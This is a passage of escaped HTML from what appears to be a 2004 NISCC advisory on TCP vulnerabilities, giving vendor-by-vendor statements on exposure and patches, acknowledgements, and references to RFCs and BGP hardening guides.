href=\"#polycom\"\u003ePolycom\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#cray\"\u003eCray Inc\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#lucent\"\u003eLucent Technologies\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"34%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#seccomp\"\u003eSecure Computing Corporation\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#hitachi\"\u003eHitachi\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#mitel\"\u003eMitel Networks\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"34%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#yamaha\"\u003eYamaha\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#innovaphone\"\u003eInnovaphone\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"33%\"\u003e\u003cfont size=\"2\"\u003e\u003ca href=\"#mrlg\"\u003eMRLG\u003c/a\u003e\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"34%\"\u003e\u0026nbsp;\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003c/table\u003e\n\u003c/p\u003e\n\n\u003cbr\u003e\n\u003ctable border=\"0\" width=\"100%\" cellpadding=\"8\" cellspacing=\"0\"\u003e\n\n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"certicom\"\u003e\u003c/a\u003eCerticom\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    Certicom has examined the National Infrastructure Security Coordination \n    Centre (NISCC) advisory and determined it is not vulnerable.\u003cbr\u003e\n    \u003cbr\u003eCerticom \n    Developer Toolkits for SSL (SSL Plus, SSL Plus for Java, Security Builder \n    SSL-C and Security Builder SSL-J) do not provide a TCP/IP transport \n    mechanism, but rather utilize the supported operating system\u0027s TCP/IP stack. \n    The vulnerability is against the TCP/IP stack itself, and not directly \n    against the functionality offered by Certicom toolkits. Therefore, there is \n    no patch or workaround that can be implemented within Certicom products. The \n    patch or workaround must be provided by the operating system vendor.\u003cbr\u003e\n    \u003cbr\u003e\n    Customers are urged to contact their operating system vendors to determine \n    if they have provided a workaround to this advisory. If you have any further \n    questions please do not hesitate to contact\n    \u003ca href=\"mailto:support@certicom.com\"\u003esupport@certicom.com\u003c/a\u003e.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\u003cu\u003e\u003ca name=\"checkpoint\"\u003e\u003c/a\u003e\n    Check Point\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003eThe latest release for VPN-1/FireWall-1 \n    (R55 HFA-03) contains a protection against this vulnerability.\u0026nbsp; The \n    protection applies to both the firewall device and to hosts behind the \n    firewall.\u003cbr\u003e\n    \u003cbr\u003e\n    Please refer to the Check Point web site for further information at:\u003cbr\u003e\n    \u003ca HREF=\"http://www.checkpoint.com/techsupport/alerts/tcp_dos.html\"\u003e\n    http://www.checkpoint.com/techsupport/alerts/tcp_dos.html\u003c/a\u003e.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"cisco\"\u003e\u003c/a\u003eCisco\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    Cisco Systems is addressing the vulnerabilities identified by NISCC \n    Vulnerability Advisory 236929 across its entire product line.\u0026nbsp; Cisco \n    has released two related advisories:\u003cbr\u003e\n    \u003cbr\u003e\n    TCP Vulnerabilities in Multiple IOS-Based Cisco Products\u003cbr\u003e\n    \u003ca href=\"http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml\"\u003ehttp://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml\u003c/a\u003e\u003cbr\u003e\n    \u003cbr\u003e\n    TCP Vulnerabilities in Multiple Non-IOS Cisco Products\u003cbr\u003e\n    \u003ca href=\"http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml\"\u003ehttp://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\n    \u003cu\u003e\u003ca name=\"cray\"\u003e\u003c/a\u003eCray Inc\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003eCray Inc. is vulnerable on their UNICOS, \n    UNICOS/mk and UNICOS/mp systems.\u0026nbsp; Spr\u0027s have been opened to track this \n    issue.\u0026nbsp; Please contact your local Cray Service Representative for more \n    information.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"hitachi\"\u003e\u003c/a\u003eHitachi\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    Hitachi is investigating the potential impact to Hitachi\u0027s products.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\n    \u003cu\u003e\u003ca name=\"innovaphone\"\u003e\u003c/a\u003eInnovaphone\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003e\n    Not vulnerable.\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"iij\"\u003e\u003c/a\u003eInternet Initiative Japan, Inc (IIJ)\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    IIJ will release a new firmware to fix this vulnerability.\u0026nbsp; Details are \n    available on their web site at\n    \u003ca href=\"http://www.seil.jp/en/ann/announce_en_20040421_01.txt\"\u003e\n    http://www.seil.jp/en/ann/announce_en_20040421_01.txt\u003c/a\u003e.\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\n    \u003cu\u003e\u003ca name=\"interniche\"\u003e\u003c/a\u003eInterNiche\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003e=== NicheStack v2.0 TCP/IP ===\u003cbr\u003e\n    \u003cbr\u003e\n    InterNiche Technologies has updated its \n    NicheStack v2.0 TCP/IP product to handle the scenarios described in NISCC \n    Vulnerability Notice #236929.\u0026nbsp;\n    The patch is available to all InterNiche customers in accordance with the \n    terms of their current support agreements.\u003cbr\u003e\n    \u003cbr\u003e\n    More information can be found on \u003ca href=\"http://www.iNiche.com\"\u003ewww.iNiche.com\u003c/a\u003e or through \n    \u003ca href=\"mailto:support@iNiche.com\"\u003esupport@iNiche.com\u003c/a\u003e\n    \u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\n    === NicheLite v2.0 TCP/IP ===\u003cbr\u003e\n    \u003cbr\u003e\n    InterNiche Technologies has updated its \n    NicheLite v2.0 TCP/IP product to handle the scenarios described in NISCC \n    Vulnerability Notice #236929.\u0026nbsp;\n    The patch is available to all InterNiche customers in accordance with the \n    terms of their current support agreements. \u003cbr\u003e\n    \u003cbr\u003e\n    More information can be found on \u003ca href=\"http://www.iNiche.com\"\u003ewww.iNiche.com\u003c/a\u003e or through \n    \u003ca href=\"mailto:support@iNiche.com\"\u003esupport@iNiche.com\u003c/a\u003e \u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"juniper\"\u003e\u003c/a\u003e\n    Juniper Networks\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    Juniper Networks products are susceptible to this vulnerability.  Customers\n    should contact Juniper Networks Technical Assistance Center for availability and\n    download instructions.\u003cbr\u003e\n    \u003cbr\u003eAdditional information is posted on our web site at\n    \u003ca href=\"https://www.juniper.net/support\"\u003ehttps://www.juniper.net/support\u003c/a\u003e. \u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\n    \u003cu\u003e\u003ca name=\"lucent\"\u003e\u003c/a\u003eLucent Technologies\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003eLucent Technologies is aware of this \n    vulnerability advisory and is investigating any potential impact to its \n    product portfolio. As further information becomes available, Lucent will \n    provide information directly to its customers, if appropriate.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"mitel\"\u003e\u003c/a\u003eMitel Networks\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    Mitel is aware of the vulnerability and is \n    working with the vendors of our underlying networking software to assess the \n    impact and, if necessary, determine potential solutions. When more \n    information becomes available, an advisory will be issued. Please contact \u0027\u003ca href=\"mailto:security@mitel.com\"\u003esecurity@mitel.com\u003c/a\u003e\u0027 \n    if you have specific questions.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\n    \u003cu\u003e\u003ca name=\"mrlg\"\u003e\u003c/a\u003eMRLG\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003eA new version of the Multi-Router Looking Glass tool (4.3.0) has been released.\u0026nbsp; \n    This includes a patch that prevents a remote user from utilising the \u0026quot;sh ip \n    bgp neighbors\u0026quot; functionality.\u0026nbsp; This new version is available from\n    \u003ca href=\"ftp://ftp.enterzone.net/looking-glass/CURRENT/\"\u003e\n    ftp://ftp.enterzone.net/looking-glass/CURRENT/\u003c/a\u003e. \u003c/td\u003e\n  \u003c/tr\u003e\n   \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"nec\"\u003e\u003c/a\u003eNEC\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    NEC is aware of this vulnerability and is trying to determine potential \n    impacts on our products.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\n    \u003cu\u003e\u003ca name=\"nortel\"\u003e\u003c/a\u003eNortel Networks\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003eNortel Networks has evaluated this issue and testing has confirmed that it \n    is possible to successfully exploit this vulnerability. However, the \n    preconditions for a successful exploitation require levels of access to the \n    network that are unlikely to be achieved in a normal network operating \n    environment; furthermore, such levels of access would enable other forms of \n    attack with much greater impact than that achievable by exploiting this \n    vulnerability.\u003cbr\u003e\n    \u003cbr\u003e\n    Nortel Networks is continuing to validate that this \n    vulnerability has no serious consequences for Nortel equipment, and will \n    update this statement periodically.\u003c/td\u003e\n  \u003c/tr\u003e\n\n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"polycom\"\u003e\u003c/a\u003ePolycom\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    Polycom has investigated the potential \n    impact to our products for NISCC Advisory 236929.\u003cbr\u003e\n    \u003cbr\u003e\n    Specific product information will be provided at\n    \u003ca HREF=\"http://www.polycom.com/securitycenter\"\u003e\n    http://www.polycom.com/securitycenter\u003c/a\u003e.\u003c/td\u003e\n  \u003c/tr\u003e\n  \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFaf\"\u003e\n    \u003cu\u003e\u003ca name=\"seccomp\"\u003e\u003c/a\u003eSecure Computing Corporation\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFaf\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFaf\"\u003eThe Sidewinder and Sidewinder G2 firewalls offer protection against this \n    attack at all releases. As application-layer firewalls, Sidewinder and \n    Sidewinder G2 offer protection to systems behind the firewall as well as \n    protecting management connections to the firewall.\u003c/td\u003e\n  \u003c/tr\u003e\n \n  \u003ctr\u003e\n    \u003ctd width=\"100%\" colspan=\"2\" bgcolor=\"#FFFFbe\"\u003e\n    \u003cu\u003e\u003ca name=\"yamaha\"\u003e\u003c/a\u003eYamaha\u003c/u\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" bgcolor=\"#FFFFbe\"\u003e\n      \u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"97%\" bgcolor=\"#FFFFbe\"\u003e\n    Pending.\u003c/td\u003e\n  \u003c/tr\u003e\n \n  \u003c/table\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003eAcknowledgements\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\nNISCC wishes to thank the following:\u003cbr\u003e\n\u003cbr\u003e\n\u003ctable border=\"0\" cellpadding=\"6\" style=\"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber3\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"197%\"\u003eSteve Bellovin, Rob Thomas and Paul Watson for their \n    contributions to this advisory.\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"197%\"\u003eCisco Systems Inc. and Juniper Networks Inc. for their help \n    with the content of this advisory and for their support during the \n    disclosure process.\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"3%\" align=\"left\" valign=\"top\"\u003e\\x95 \u003c/td\u003e\n    \u003ctd width=\"197%\"\u003eJPCERT/CC for their assistance in co-ordinating this disclosure \n    in Japan.\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003eReferences\u003c/b\u003e\n\u003cbr\u003e\n\u003ctable border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber7\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"98%\" colspan=\"3\"\u003e\u003cb\u003eInternet Engineering Task Force\u003c/b\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eRFC 793 Transmission Control Protocol\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\u003ca href=\"http://www.ietf.org/rfc/rfc793.txt\"\u003e\n    http://www.ietf.org/rfc/rfc793.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eRFC 1323 TCP Extensions for High Performance\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\"\u003e\u003ca href=\"http://www.ietf.org/rfc/rfc1323.txt\"\u003e\n    http://www.ietf.org/rfc/rfc1323.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eRFC 1771 A Border Gateway Protocol 4 (BGP-4)\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\u003ca href=\"http://www.ietf.org/rfc/rfc1771.txt\"\u003e\n    http://www.ietf.org/rfc/rfc1771.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eRFC 2385 Protection of BGP Sessions via the TCP \n    MD5 Signature Option\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\u003ca href=\"http://www.ietf.org/rfc/rfc2385.txt\"\u003e\n    http://www.ietf.org/rfc/rfc2385.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eRFC 2827 Network Ingress Filtering\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\u003ca href=\"http://www.ietf.org/rfc/rfc2827.txt\"\u003e\n    http://www.ietf.org/rfc/rfc2827.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eRFC 3562 Considerations for the TCP MD5 \n    Signature Option\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\u003ca href=\"http://www.ietf.org/rfc/rfc3562.txt\"\u003e\n    http://www.ietf.org/rfc/rfc3562.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eRFC 3682 Generalized TTL Security Mechanism\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\u003ca href=\"http://www.ietf.org/rfc/rfc3682.txt\"\u003e\n    http://www.ietf.org/rfc/rfc3682.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eInternet Draft - Transmission Control Protocol \n    security considerations\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\n    \u003ca href=\"http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\"\u003e\n    http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"98%\" colspan=\"3\"\u003e\u003cb\u003eNISCC\u003c/b\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eBest Practice Guidelines - Border Gateway \n    Protocol\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\n    \u003ca href=\"http://www.niscc.gov.uk/BGP%20Filtering%20Guide.pdf\"\u003e\n    http://www.niscc.gov.uk/BGP Filtering Guide.pdf\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"98%\" colspan=\"3\"\u003e\u003cb\u003eConfiguration and Tuning Guides\u003c/b\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eSecure BGP Template for Cisco IOS\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\n    \u003ca href=\"http://www.cymru.com/Documents/secure-bgp-template.html\"\u003e\n    http://www.cymru.com/Documents/secure-bgp-template.html\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eJUNOS Secure BGP Template\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\n    \u003ca href=\"http://www.qorbit.net/documents/junos-bgp-template.pdf\"\u003e\n    http://www.qorbit.net/documents/junos-bgp-template.pdf\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eUNIX IP Stack Tuning Guide\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\n    \u003ca href=\"http://www.cymru.com/Documents/ip-stack-tuning.html\"\u003e\n    